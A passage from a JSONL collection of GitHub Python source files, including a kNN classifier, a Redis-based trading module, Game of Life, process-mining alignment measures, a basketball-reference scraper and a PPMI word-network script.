os.path.exists(self.cookie_file):\n return False\n self.cookies = pickle.load(open( self.cookie_file, \"rb\" ))\n return self.cookies != None\n \n def fetch_config(self, force=False):\n if self.system_id is not None:\n return\n self.fetch_system_id()\n self.fetch_layout()\n self.save_config()\n\n def fetch_system_id(self):\n resp = requests.get(self.URL, cookies=self.cookies, allow_redirects=False)\n self.system_id = re.search('https://\\S+/systems/(\\S+)', resp.headers['location'])[1]\n\n def fetch_layout(self):\n path = f'/systems/{self.system_id}/site_array_layout_x'\n resp = requests.get(self.URL + path, cookies=self.cookies)\n arr = resp.json()\n # NOTE: sort by position along x\n self.modules = sorted(arr['arrays'][0]['modules'], key= lambda x: x['x'])\n self.device_index = [ m['inverter']['inverter_id'] for m in self.modules ]\n \n def save_config(self):\n if not self.persist_config:\n return\n c_data = {\n 'system_id': self.system_id,\n 'device_index': self.device_index\n }\n pickle.dump( c_data, open( self.config_file, \"wb\" ) )\n\n def load_config(self):\n if not os.path.exists(self.config_file):\n return False\n c_data = pickle.load(open( self.config_file, \"rb\" ))\n self.system_id = c_data['system_id']\n self.device_index = c_data['device_index']\n return True\n\n def time_axis(self, start):\n mins = self.minute_axis\n return [ start + timedelta(minutes=int(m)) for m in mins ]\n\n def get_day(self, date):\n date_str = date.strftime('%Y-%m-%d')\n path = f'/systems/{self.system_id}/inverter_data_x/time_series.json'\n params = {'date': date_str}\n return requests.get(self.URL + path, params=params, cookies=self.cookies).json()\n\n def fetch_day(self, date):\n date_key = date.strftime('%Y-%m-%d')\n self.power_data[date_key] = self.process_day(self.get_day(date))\n\n def inverter_details(self, date):\n # { \"date\": \"...\", \"ch_id\": ..., \n # \"POWR\":[[

    {repr(error)}
    \")\n\n","repo_name":"sitbon/hydra-chain-bot","sub_path":"hybot/bot/hydra/tz.py","file_name":"tz.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17320558377","text":"# -*- coding: utf-8 -*-#\n\"\"\"\n@File : neighbors.py \n@Contact : sheng_jun@yeah.net\n@Author : Ace\n@Description: \n@Modify Time @Version @Desciption\n------------ -------- -----------\n2021-07-25 0:06 1.0 None\n\"\"\"\nimport numpy as np\nfrom collections import Counter\nfrom math import sqrt\nfrom .metrics import accuracy_score\n\n\nclass KNeighborsClassifier:\n \"\"\"\n 通过KNeighbors创建一个kNN类,用于分类算法\n \"\"\"\n\n def __init__(self, n_neighbors=5):\n assert n_neighbors > 1, \"n_neighbors必须是有效的\"\n self.n_neighbors = n_neighbors\n self._X_train = None\n self._y_train = None\n\n def fit(self, X_train, y_train):\n \"\"\"数据拟合过程,在kNN中为了何其他机器学习格式统一,加入这个方法,进行训练数据赋值\"\"\"\n assert X_train.shape[0] == y_train.shape[0], \"传入的训练特征数据必须与传入的训练结果样本数相同\"\n assert self.n_neighbors <= X_train.shape[0], \"n_neighbors传入值不能超过训练特征样本数\"\n self._X_train = X_train\n self._y_train = y_train\n return self\n\n def predict(self, X_predict):\n \"\"\"对输入的X_predict进行预测,预测之前必须进行数据拟合\"\"\"\n assert self._X_train is not None and self._y_train is not None, \"predict之前必须先进行fit\"\n assert self._X_train.shape[1] == X_predict.shape[1], \"预测特征向量的维度必须等于测试特征向量的维度\"\n y_predict = [self._predict(x) for x in X_predict]\n return np.array(y_predict)\n\n def _predict(self, x):\n assert x.shape[0] == self._X_train.shape[1], \"预测值的特征维度必须等于训练集的特征维度\"\n distances = [sqrt(np.sum((x_train - x) ** 2)) for x_train in self._X_train]\n nearest = np.argsort(distances)\n topK_y = self._y_train[nearest[:self.n_neighbors]]\n votes = Counter(topK_y)\n votes.most_common(1)\n return votes.most_common(1)[0][0]\n\n def score(self, X_test, y_test):\n y_predict = self.predict(X_test)\n return accuracy_score(y_test, y_predict)\n","repo_name":"on3o/Luna","sub_path":"moon/neighbors.py","file_name":"neighbors.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1516512479","text":"def getLeaders(nums):\n leaders = []\n if not nums:\n return False\n for i in range(len(nums)):\n flag = True\n for j in range(i+1, len(nums)):\n if nums[i] < nums[j]:\n flag = False\n break\n if flag == True:\n leaders.append(nums[i])\n return leaders\n\n#nums = [16,17,4,3,5,2]\n#nums = [1, 2, 3, 4, 0]\nnums = [7, 4, 5, 7, 3]\nprint(getLeaders(nums))\n","repo_name":"kumvika/leetcode-solution","sub_path":"leadersInArray.py","file_name":"leadersInArray.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6451847323","text":"import redis\nimport ujson as json\n\nimport pytz\nimport time\nimport datetime\nimport logging\nfrom collections import defaultdict\nfrom django.utils import timezone\nfrom croniter import croniter\nimport asyncio\nfrom abc import abstractmethod, ABCMeta\nimport aioredis\n\nfrom trader.utils.func_container import CallbackFunctionContainer\nfrom trader.utils.read_config import config\n\nlogger = logging.getLogger('BaseModule')\n\n\nclass BaseModule(CallbackFunctionContainer, metaclass=ABCMeta):\n def __init__(self):\n super().__init__()\n self.io_loop = asyncio.new_event_loop()\n asyncio.set_event_loop(self.io_loop)\n self.redis_client = aioredis.from_url(\n f\"redis://{config.get('REDIS', 'host', fallback='localhost')}:\"\n f\"{config.getint('REDIS', 'port', fallback=6379)}/{config.getint('REDIS', 'db', fallback=0)}\",\n decode_responses=True)\n self.raw_redis = redis.StrictRedis(host=config.get('REDIS', 'host', fallback='localhost'),\n port=config.getint('REDIS', 'port', fallback=6379),\n db=config.getint('REDIS', 'db', fallback=0), decode_responses=True)\n self.sub_client = self.redis_client.pubsub()\n self.initialized = False\n self.sub_tasks = list()\n self.sub_channels = list()\n self.channel_router = dict()\n self.crontab_router = defaultdict(dict)\n self.datetime = None\n self.time = None\n self.loop_time = None\n\n def _register_callback(self):\n self.datetime = timezone.localtime()\n self.time = time.time()\n self.loop_time = self.io_loop.time()\n for fun_name, args in self.callback_fun_args.items():\n if 'crontab' in args:\n key = args['crontab']\n self.crontab_router[key]['func'] = getattr(self, fun_name)\n self.crontab_router[key]['iter'] = croniter(args['crontab'], self.datetime)\n self.crontab_router[key]['handle'] = None\n elif 'channel' in args:\n self.channel_router[args['channel']] = getattr(self, fun_name)\n\n def _get_next(self, key):\n return self.loop_time + (self.crontab_router[key]['iter'].get_next() - self.time)\n\n def _call_next(self, key):\n if self.crontab_router[key]['handle'] is not None:\n self.crontab_router[key]['handle'].cancel()\n self.crontab_router[key]['handle'] = self.io_loop.call_at(self._get_next(key), self._call_next, key)\n self.io_loop.create_task(self.crontab_router[key]['func']())\n\n async def install(self):\n try:\n self._register_callback()\n await self.sub_client.psubscribe(*self.channel_router.keys())\n asyncio.run_coroutine_threadsafe(self._msg_reader(), self.io_loop)\n # self.io_loop.create_task(self._msg_reader())\n for key, cron_dict in self.crontab_router.items():\n if cron_dict['handle'] is not None:\n cron_dict['handle'].cancel()\n cron_dict['handle'] = self.io_loop.call_at(self._get_next(key), self._call_next, key)\n self.initialized = True\n logger.debug('%s plugin installed', type(self).__name__)\n except Exception as e:\n logger.error('%s plugin install failed: %s', type(self).__name__, repr(e), exc_info=True)\n\n async def uninstall(self):\n try:\n await self.sub_client.punsubscribe()\n # await asyncio.wait(self.sub_tasks, loop=self.io_loop)\n self.sub_tasks.clear()\n await self.sub_client.close()\n for key, cron_dict in self.crontab_router.items():\n if self.crontab_router[key]['handle'] is not None:\n self.crontab_router[key]['handle'].cancel()\n self.crontab_router[key]['handle'] = None\n self.initialized = False\n logger.debug('%s plugin uninstalled', type(self).__name__)\n except Exception as e:\n logger.error('%s plugin uninstall failed: %s', type(self).__name__, repr(e), exc_info=True)\n\n async def _msg_reader(self):\n # {'type': 'pmessage', 'pattern': 'channel:*', 'channel': 'channel:1', 'data': 'Hello'}\n async for msg in self.sub_client.listen():\n if msg['type'] == 'pmessage':\n channel = msg['channel']\n pattern = msg['pattern']\n data = json.loads(msg['data'])\n # logger.debug(\"%s channel[%s] Got Message:%s\", type(self).__name__, channel, msg)\n self.io_loop.create_task(self.channel_router[pattern](channel, data))\n elif msg['type'] == 'punsubscribe':\n break\n logger.debug('%s quit _msg_reader!', type(self).__name__)\n\n async def start(self):\n await self.install()\n\n async def stop(self):\n await self.uninstall()\n\n def run(self):\n try:\n self.io_loop.create_task(self.start())\n self.io_loop.run_forever()\n except KeyboardInterrupt:\n self.io_loop.run_until_complete(self.stop())\n except Exception as ee:\n logger.error('发生错误: %s', repr(ee), exc_info=True)\n self.io_loop.run_until_complete(self.stop())\n finally:\n logger.debug('程序已退出')\n","repo_name":"BigBrotherTrade/trader","sub_path":"trader/strategy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":1749,"dataset":"github-code","pt":"35"} +{"seq_id":"971835809","text":"# -*- coding: utf-8 -*-\n\n\n# def consumer():\n# r = 'here'\n# for i in range(3):\n# print(i, r)\n# x = yield r\n# y = yield 1\n# print('x:', x, 'y:', y)\n# r = r + str(i)\n\n\n# c = consumer()\n# n1 = c.__next__()\n# n2 = c.send(100)\n# n3 = c.__next__()\n# print('n1:%s,n2:%s,n3:%s' % (n1, n2, n3))\n\n\ndef fun():\n for i in range(20):\n x = yield i\n print(\"fun,x=%s,i=%s\" % (x, i))\n\n\na = fun()\nnext(a)\nx = a.send(5)\nprint(x)\n","repo_name":"wccgoog/pass","sub_path":"python/learn_yield.py","file_name":"learn_yield.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42073634322","text":"# 로봇청소기 (4991)\n\n'''\n두 번째 시도 : 로봇의 위치와 더러운 칸의 모든 좌표에서 각각 bfs를 통해 좌표들 사이의 최솟값을 구했다.\n 그에 대한 정보들을 순열을 통해 거리 최솟값 구함.\n 1. o 의 위치를 변수로 저장 / * 들을 리스트 안에 저장\n 2. o 로부터 모든 * 에 대한 거리를 구함\n 3. 모든 *간의 거리를 구함\n 4. 순열로 갈 수 있는 모든 경로 구해 놓고 거리를 다 더한 최소값 출력\n'''\n\nfrom collections import deque\nfrom itertools import permutations\nimport sys\n\ninput = sys.stdin.readline\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\ndef bfs(x, y):\n q = deque()\n visited = [[0]*w for _ in range(h)]\n q.append([x, y])\n visited[x][y] = 1\n while q:\n x, y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < h and 0 <= ny < w:\n if matrix[nx][ny] != 'x' and not visited[nx][ny]:\n visited[nx][ny] = visited[x][y] + 1\n q.append([nx, ny])\n return visited\n\nwhile True:\n w, h = map(int, input().split())\n if not w and not h:\n break\n\n matrix, d = [], []\n for i in range(h):\n row = list(input().strip())\n matrix.append(row)\n for j, k in enumerate(row):\n if k == 'o':\n sx, sy = i, j\n elif k == '*':\n d.append([i, j])\n\n r2d, flag = [], 0\n c = bfs(sx, sy)\n for i, j in d:\n if not c[i][j]:\n flag = 1\n break\n r2d.append(c[i][j]-1)\n if flag:\n print(-1)\n continue\n\n d2d = [[0]*len(d) for _ in range(len(d))]\n for i in range(len(d)-1):\n c = bfs(d[i][0], d[i][1])\n for j in range(i+1, len(d)):\n d2d[i][j] = c[d[j][0]][d[j][1]]-1\n d2d[j][i] = d2d[i][j]\n\n p = list(permutations([i for i in range(len(d2d))]))\n ans = sys.maxsize\n for i in p:\n dist = 0\n dist += r2d[i[0]]\n nfrom = i[0]\n for j in range(1, len(i)):\n nto = i[j]\n dist += d2d[nfrom][nto]\n nfrom = nto\n ans = min(ans, dist)\n print(ans)\n","repo_name":"apple2062/algorithm","sub_path":"study/sorting/로봇청소기.py","file_name":"로봇청소기.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35367130757","text":"import inout as io\nimport os\nfrom copy import deepcopy\nfrom time import sleep\n\nSTART = \"start.txt\"\n\nMATRIX_SIZE_1 = 20 # 43\nMATRIX_SIZE_2 = 20 # 80\n\ni_ADD = [-1, -1, -1, 0, 0, 1, 1, 1]\nj_ADD = [-1, 0, 1, -1, 1, -1, 0, 1]\n\ndef main():\n global START\n global MATRIX_SIZE_1\n global MATRIX_SIZE_2\n global i_ADD\n global j_ADD\n\n board = io.load(START, MATRIX_SIZE_1, MATRIX_SIZE_2) # Dodatni redovi za hendlovanje izuzetaka\n board1 = [[0 for j in range(MATRIX_SIZE_2 + 2)] for i in range(MATRIX_SIZE_1 + 2)] # Dodatni redovi za hendlovanje izuzetaka\n\n io.printBoard(board, MATRIX_SIZE_1, MATRIX_SIZE_2)\n inp = input()\n\n while not inp == '0':\n for i in range(1, MATRIX_SIZE_1 + 1):\n for j in range(1, MATRIX_SIZE_2 + 1):\n liveCells = 0\n for k in range(8):\n liveCells += board[i + i_ADD[k]][j + j_ADD[k]]\n\n if liveCells <= 1 or liveCells >= 4:\n board1[i][j] = 0\n elif board[i][j] == 1 and liveCells == 2 or liveCells == 3:\n board1[i][j] = 1\n elif liveCells == 3:\n board1[i][j] = 1\n else:\n board1[i][j] = 0\n \n board = deepcopy(board1)\n os.system('cls')\n io.printBoard(board, MATRIX_SIZE_1, MATRIX_SIZE_2)\n #sleep(0.5)\n inp = input()\n\nif __name__ == \"__main__\":\n main()","repo_name":"eru27/Python-Workshop","sub_path":"GameOfLife/Finished/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73164444579","text":"import json\n\nfrom typing import Dict, Set\nfrom idgames.engine import Engine\nfrom utils.config import Config\nfrom utils.logger import Logger\n\nengine_factors = {\n Engine.DOOM.value: 1.5,\n Engine.HERETIC.value: 1.5,\n Engine.HEXEN.value: 1.5,\n Engine.STRIFE.value: 1.5,\n Engine.BOOM.value: 1.0,\n Engine.MBF.value: 1.0,\n Engine.ZDOOM.value: 1.0,\n Engine.GZDOOM.value: 1.0,\n Engine.LEGACY.value: 1.0,\n Engine.SKULLTAG.value: 1.0,\n Engine.ZDAEMON.value: 1.0,\n Engine.DOOMSDAY.value: 1.0,\n Engine.EDGE.value: 1.0,\n Engine.ETERNITY.value: 1.0,\n Engine.DOOMRETRO.value: 1.0,\n Engine.ZANDRONUM.value: 1.0,\n}\n\nconfig = Config()\n\nwith open(config.get('extractors.engine.doomednum_table'), 'r') as f:\n engines = json.load(f)\n\n# Create sets of doomednums for each engine.\nengine_doomednums: Dict[str, Set[str]] = {}\nfor engine_key, doomednums in engines.items():\n\n clean_doomednums = []\n for doomednum in doomednums:\n if isinstance(doomednum, int):\n clean_doomednums.append(doomednum)\n elif isinstance(doomednum, str):\n a, b = doomednum.split('-')\n a = int(a)\n b = int(b)\n for num in range(a, b + 1):\n clean_doomednums.append(num)\n\n engine_doomednums[engine_key] = set(clean_doomednums)\n\n# List which engines each doomednum appears in.\ndoomednum_engines: Dict[int, Set[str]] = {}\nfor engine_key, doomednums in engine_doomednums.items():\n engine_factor = engine_factors.get(engine_key, 1.0)\n\n for doomednum in doomednums:\n if doomednum not in doomednum_engines:\n doomednum_engines[doomednum] = set()\n doomednum_engines[doomednum].add(engine_key)\n\n# Calculate score for each engine in each doomednum.\ndoomednum_scores: Dict[str, Dict[str, float]] = {}\nfor doomednum, engine_keys in doomednum_engines.items():\n if len(engine_keys) == len(engine_factors):\n continue\n\n average = 1 / len(engine_keys)\n presence_scores: Dict[str, float] = {}\n for engine_key in engine_keys:\n presence_scores[engine_key] = average * engine_factors[engine_key]\n\n doomednum_scores[doomednum] = presence_scores\n\nwith open(config.get('extractors.engine.doomednum_scores'), 'w') as f:\n json.dump(doomednum_scores, f, indent=4)\n","repo_name":"GitExl/DoomIdgamesArchive","sub_path":"idgames-extract/src/generatedoomednumscores.py","file_name":"generatedoomednumscores.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"13336598435","text":"import numpy as np\nfrom tqdm import tqdm\n\ndef filter_case_variants(ocel, variant_column, id_column, save_path):\n \"\"\"\n Function to filter an object-centric event log such that it only contains one case per case variant of the original log.\n :param ocel: object-centric event log that should be filtered, type: ocel-log\n :param variant_column: column name of the variant column in the log, type: string\n :param id_column: column name of the id column in the log, type: string\n :param save_path: path where the filtered log should be saved, type: string\n \"\"\"\n # generate the variants of the log by executing the variants method from the ocel class once\n ocel.variants\n # we filter down the dataframe to only keep the first appearance of each variant definition in the variant column\n case_ids = ocel.log.log.drop_duplicates(subset=[variant_column], keep='first')[id_column]\n # we generate a list to keep only the cases (process executions) that contain one of the ids that we filtered before\n # such that we only have one case per variant\n filtered_case_list = [s for s in ocel.process_executions if any(v in s for v in case_ids)]\n # we create a boolean mask indicating which rows contain case ids in the filtered list of sets\n mask = ocel.log.log[id_column].isin([i for s in filtered_case_list for i in s])\n # we apply the mask to the DataFrame to generate the filtered one\n filtered_df = ocel.log.log[mask]\n # in a next step we save the filtered dataframe as a csv file to be able to import it as an ocel-log\n filtered_df.to_csv(save_path, index=False)\n\ndef alignment_measure_events(ocel,ocpn):\n \"\"\"\n Function to calculate the alignment measure based on the used places summing over the events inside an object-centric petri-net.\n :param ocel: object-centric event log for which the measure should be calculated, type: ocel-log\n :param ocpn: corresponding object-centric petri-net, type: object-centric petri-net\n :return: final value of the formula, type: float rounded to 4 digits\n \"\"\"\n #list for values in sum of formula\n pnew = []\n # get a list of all activities that have been performed in the log\n log = ocel.log.log.event_activity\n # We only calculate the values for \"non-silent\" transitions\n transitions = [x for x in ocpn.transitions if not x.silent]\n # dictionary to store each activity as key and a list of its prior states/places as value\n targets = {}\n for arc in tqdm(ocpn.arcs, desc=\"Check the arcs\"):\n # for each arc, check if our target is a valid (non-silent) transition\n if arc.target in transitions:\n # load all the prior places of a valid transition into a dictionary, where the key is the transition and the value\n # a list of all directly prior places\n if arc.target.name in targets:\n targets[arc.target.name].append(arc.source.name)\n else:\n targets[arc.target.name] = [arc.source.name]\n # for each valid transition/event -> for computing reasons(efficiency), we work with a small difference to above\n for event in tqdm(transitions, desc=\"Save the transitions\"):\n # create an empty list where we can store all enabled transitions in the specific prior place\n enabled= []\n # print(event) #used for debugging\n # get the list of all events that are simultaneously possible in the current state\n for key in targets:\n # we check if the value is the same or if the value of another key is a subset, because then it is also enabled\n if (targets[event.name] == targets[key]) or (set(targets[key]).issubset(set(targets[event.name]))):\n enabled.append(key)\n # number of activities that can be triggered\n w = len(enabled)\n # number of times this state is visited in the log\n n = len(log[log.isin(enabled)])\n # frequency of event that is currently watched\n freq = len(log[log == event.name])\n #print(w) #used for debugging\n #print(n) #used for debugging\n #print(freq) #used for debugging\n # derive the value for the sum in the formula given\n if n >= w+2 :\n pnew.append(freq*(w*(w+1))/(n*(n-1)))\n else:\n pnew.append(freq*1)\n #derive the final generalization value\n return np.round((1 - np.sum(pnew)/len(log)),4)\n\n\ndef alignment_measure_states(ocel,ocpn):\n \"\"\"\n Function to calculate the alignment measure based on the used places summing over the states inside an object-centric petri-net.\n :param ocel: object-centric event log for which the measure should be calculated, type: ocel-log\n :param ocpn: corresponding object-centric petri-net, type: object-centric petri-net\n :return: final value of the formula, type: float rounded to 4 digits\n \"\"\"\n #list for values in sum of formula\n pnew = []\n # We only calculate the values for \"non-silent\" transitions\n transitions = [x for x in ocpn.transitions if not x.silent]\n # dictionary to store each activity as key and a list of its prior states/places as value\n targets = {}\n # get a list of all activities that have been performed in the log\n log = ocel.log.log.event_activity\n for arc in tqdm(ocpn.arcs, desc=\"Check the arcs\"):\n # for each arc, check if our target is a valid (non-silent) transition\n if arc.target in transitions:\n # load all the prior places of a valid transition into a dictionary, where the key is the transition and the value\n # a list of all directly prior places\n if arc.target.name in targets:\n targets[arc.target.name].append(arc.source.name)\n else:\n targets[arc.target.name] = [arc.source.name]\n #get the list of all possible states for our model\n states = list(targets.values())\n #get the list of all possible keys in our targets dictionary\n keys_list = list(targets.keys())\n #define a counting variable for the number of states\n i = 0\n # for each valid transition/event -> for computing reasons(efficiency), we work with a small difference to above\n for state in tqdm(states, desc=\"Save the states\"):\n # create an empty list where we can store all enabled transitions in the specific prior state\n enabled= []\n #define an empty string that should hold the name of the event we are currently investigating\n event_name = keys_list[i]\n # get the list of all events that are simultaneously in the current state\n for key in targets:\n # we check if the value is the same as the state or if the value of another key is a subset, because then it is also enabled\n if (state == targets[key]) or (set(targets[key]).issubset(set(state))):\n enabled.append(key)\n\n # number of activities that happened in the state\n w = len(enabled)\n # number of times this state has visited in the log\n n = len(log[log.isin(enabled)])\n # number of times this state was visited in the log\n freq = len(log[log == event_name])\n #print(w) #used for debugging\n #print(n) #used for debugging\n #print(freq) #used for debugging\n if n >= w+2 :\n pnew.append(freq*(w*(w+1))/(n*(n-1)))\n else:\n pnew.append(freq*1)\n #increase the counting variable\n i += 1\n #derive the final generalization value\n return np.round((1 - np.sum(pnew)/len(states)),4)","repo_name":"NiklasSabel/Generalization_in_Object_Centric_Process_Mining","sub_path":"models/alignment_measure.py","file_name":"alignment_measure.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35963616826","text":"\n'''\n This is the all full code for take the time\n This code will handle the execution time using the time.time() method in python and\n here use the random arrays (using the random()) as the input to the algorithm to sorting to\n ascending order\n'''\n\nimport time\nimport random\n\n\nrandom.seed()\n\n\n#test cases enable what you want\n# This will generate the 10000 length of numbers that are in range 1-1000000\n#mylist=[random.randint(5,5) for i in range (2)] # you can change the number of elements here\n#mylist=sorted(mylist, key=int, reverse=True) # input a descending order list\n#mylist=sorted(mylist) # input the ascending order list\nmylist=[]\n#print(mylist)\nmylist1=list(mylist) # tempary variables\nmylist2=list(mylist)\n\nstart=time.time()\ndef bubble_sort(mylist):\n length=len(mylist)\n for i in range (length-1,0,-1): # reverse for loop to reduse the lenght one by one\n #to chech the max ans swaping each of them\n for j in range (0,i): # 0 to n-2\n if mylist[j+1]0:\n mylist[j]=mylist[j-1] # shifting\n j=j-1 # shifting back derection\n\n mylist[j]=current\n \n\ninsertion_sort(mylist)\nend =time.time()\n\nelapsedtime=end-start\nprint(\"Insertion sort\")\nprint(\"time(ms) : %0.5f\"% (1000*elapsedtime))\nprint()","repo_name":"MalithaDilshan/Data-Structures-and-Algorithms","sub_path":"Sorting/Timing Analize(simple)/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24492127968","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nfrom tqdm import tqdm\n\ndef get_season_data():\n \"\"\" Extract table contents and player details in order to create a\n list of dataframes for batching and saving into CSVs \"\"\"\n\n url = \"https://www.basketball-reference.com\"\n season_list = create_player_season_list()\n df_list = []\n counter = 0\n\n for season in tqdm(season_list,desc=\"Extracting season data…\",):\n details = []\n link = url + season\n\n raw_html = requests.get(link).text\n soup = BeautifulSoup(raw_html, 'lxml')\n\n div = soup.find('div', {'id':'meta'})\n for span in div.find_all('span'):\n details.append(span.text.strip('\\n'))\n\n header_split = details[0].split(' ')\n name = header_split[0]+' '+header_split[1]\n\n df = pd.read_html(link)\n df_season = df[-1].copy()\n\n df_season['Name'] = name\n df_season['Height'] = details[1]\n df_season['Weight'] = details[2]\n df_season['Year_Born'] = details[3][-4:]\n\n df_list.append(df_season)\n\n if len(df_list)%50==0:\n df = pd.concat(df_list)\n df.to_csv(f'data_raw/batch_{counter}.csv', index=False)\n df_list = []\n counter+=1\n\n df = pd.concat(df_list)\n df.to_csv(f'data_raw/batch_{counter}.csv', index=False)\n\n return\n\n\ndef create_player_season_list():\n \"\"\" Create a list of links by player href that will get me to\n individual season page\"\"\"\n\n url = \"https://www.basketball-reference.com\"\n\n href_list = create_player_href_list()\n per_game_list = []\n\n for href in tqdm(href_list,desc=\"Extracting player hrefs…\",):\n\n link = url + href\n\n raw_html = requests.get(link).text\n soup = BeautifulSoup(raw_html, 'lxml')\n\n table = soup.find('table', {'id':'per_game'})\n for tr in table.find_all('tr'):\n try:\n tr_text = tr.find('a').get('href')\n if tr_text[1:8] == 'players':\n per_game_list.append(tr_text)\n except:\n continue\n\n return per_game_list\n\n\ndef create_player_href_list():\n \"\"\" Create a list of links by player href that will get me to\n individual player page\"\"\"\n\n link_list = create_link_list()\n\n href_list = []\n\n for link in tqdm(link_list,desc=\"Extracting player links…\",):\n\n raw_html = requests.get(link).text\n soup = BeautifulSoup(raw_html, 'lxml')\n\n table = soup.find('table', {'id':'players'})\n for strong in table.find_all('strong'):\n href_list.append(strong.find('a').get('href'))\n\n return href_list\n\n\ndef create_link_list():\n \"\"\" Create a list of links by letter that will get me to href\n page for individual players \"\"\"\n\n url = \"https://www.basketball-reference.com/players/\"\n letters = ['A','B','C','D','E','F','G','H','I','J','K',\n 'L','M','N','O','P','Q','R','S','T','U','V',\n 'W','X','Y','Z',]\n\n link_list = []\n\n for letter in letters:\n link_list.append(url+letter.lower())\n\n return link_list\n\n\nif __name__ == '__main__':\n get_season_data()\n","repo_name":"Bkukov/nba_scraper","sub_path":"scrape_raw.py","file_name":"scrape_raw.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30432296290","text":"#!/usr/bin/env python\n\n\"\"\" Test or train global embedding on the breakfast with unknown high-level activity classes\n\"\"\"\n\n__author__ = 'Anna Kukleva'\n__date__ = 'July 2020'\n\nimport sys\nimport os\nsys.path.append(os.path.abspath('.').split('data_utils')[0])\n\nfrom ute.utils.arg_pars import opt\nfrom data_utils.BF_utils.update_argpars import update\nfrom ute.global_corpus import run_pipeline\n\nif __name__ == '__main__':\n opt.global_pipe = True\n opt.subaction = 'global'\n\n # set root\n opt.dataset_root = '/BS/kukleva/work/data/bf/fv'\n\n # global parameters\n opt.global_K = 5\n opt.global_k_prime = 10\n\n # set feature extension and dimensionality\n opt.ext = 'txt'\n opt.feature_dim = 64\n\n # model name can be 'mlp' or 'nothing' for no embedding (just raw features)\n opt.model_name = 'mlp'\n\n # load an already trained model (stored in the models directory in dataset_root)\n opt.load_model = True\n # opt.loaded_model_name = 'global.pth.tar'\n opt.loaded_model_name = 'global%d_%d.pth.tar' % (opt.global_K, opt.global_k_prime)\n\n # update log name and absolute paths\n update()\n\n run_pipeline()\n\n","repo_name":"Annusha/unsup_temp_embed","sub_path":"data_utils/BF_utils/bf_global.py","file_name":"bf_global.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"35"} +{"seq_id":"27005335788","text":"'''\nTools for building and analyzing a semantic network starting from\na list of lists of text\n\nAuthor: Matthew A Turner\nDate: 9 January 2017\n'''\nimport networkx as nx\n\nfrom numpy import array, zeros, log, flipud, power\nfrom numpy.linalg import norm\nfrom nltk.corpus import stopwords\nfrom sklearn.utils.extmath import randomized_svd\nfrom sklearn.preprocessing import normalize\n\nSTOPWORDS = stopwords.words('english')\n\n\nclass LookupCount:\n def __init__(self, index):\n self.index = index\n self.count = 1\n\n\n# we first need to iterate through the texts to find $f_q(x, y)$\n# for all $x$ and $y$\ndef _calculate_ppmi(texts, window_distance, alpha,\n verbose=False, saveroot='ppmi_calculation'):\n '''\n\n '''\n word_lookup_counts = {}\n context_lookup_counts = {}\n word_idx = 0\n\n # step 1) individual word counts and joint word/context counts\n for idx, text in enumerate(texts):\n if verbose:\n print('on text {} out of {} calculating PPMI matrix'.format(\n idx, len(texts)\n )\n )\n for ii, word in enumerate(text):\n\n # handle single-word frequency\n if word not in word_lookup_counts:\n word_lookup_counts.update({word: LookupCount(word_idx)})\n word_idx += 1\n else:\n word_lookup_counts[word].count += 1\n\n # determine f_q(x, y)\n # first, window indices\n w1 = ii + 1\n w2 = w1 + window_distance\n for context in text[w1:w2]:\n if (word, context) not in context_lookup_counts:\n context_lookup_counts.update({(word, context): 1})\n else:\n context_lookup_counts[(word, context)] += 1\n\n # now look previous\n if ii > 0:\n w = max(ii - window_distance, 0)\n for context in text[w:ii]:\n if (word, context) not in context_lookup_counts:\n context_lookup_counts.update({(word, context): 1})\n else:\n context_lookup_counts[(word, context)] += 1\n\n # step 2) process word and joint counts to calculate PPMI matrix\n\n N = len(word_lookup_counts.items())\n norm_coeff = 1.0 / N\n\n # context smoothing \"alleviates bias towards rare words\"\n # Levy, O., Goldberg, Y., & Dagan, I. (2015).\n # Transactions of the Association for Computational Linguistics, 3, 211–225\n scaled_context_vec = power(\n array([v.count for v in word_lookup_counts.values()]),\n alpha\n )\n scaled_context_norm_coeff = 1.0 / norm(scaled_context_vec)\n\n ppmi_matrix = zeros((N, N))\n\n word_context_pairs = set(context_lookup_counts.keys())\n\n pairs_lookup = {}\n for wc_pair in word_context_pairs:\n word = wc_pair[0]\n if word in pairs_lookup:\n pairs_lookup[word].append(wc_pair)\n else:\n pairs_lookup.update({word: [wc_pair]})\n\n for word, lookup_count in word_lookup_counts.items():\n\n i = lookup_count.index\n P_word = norm_coeff * lookup_count.count\n\n relevant_pairs = pairs_lookup[word]\n\n for pair in relevant_pairs:\n\n context = pair[1]\n context_wlc = word_lookup_counts[context]\n\n j = context_wlc.index\n\n P_context = \\\n scaled_context_norm_coeff * pow(context_wlc.count, alpha)\n\n P_joint = norm_coeff * 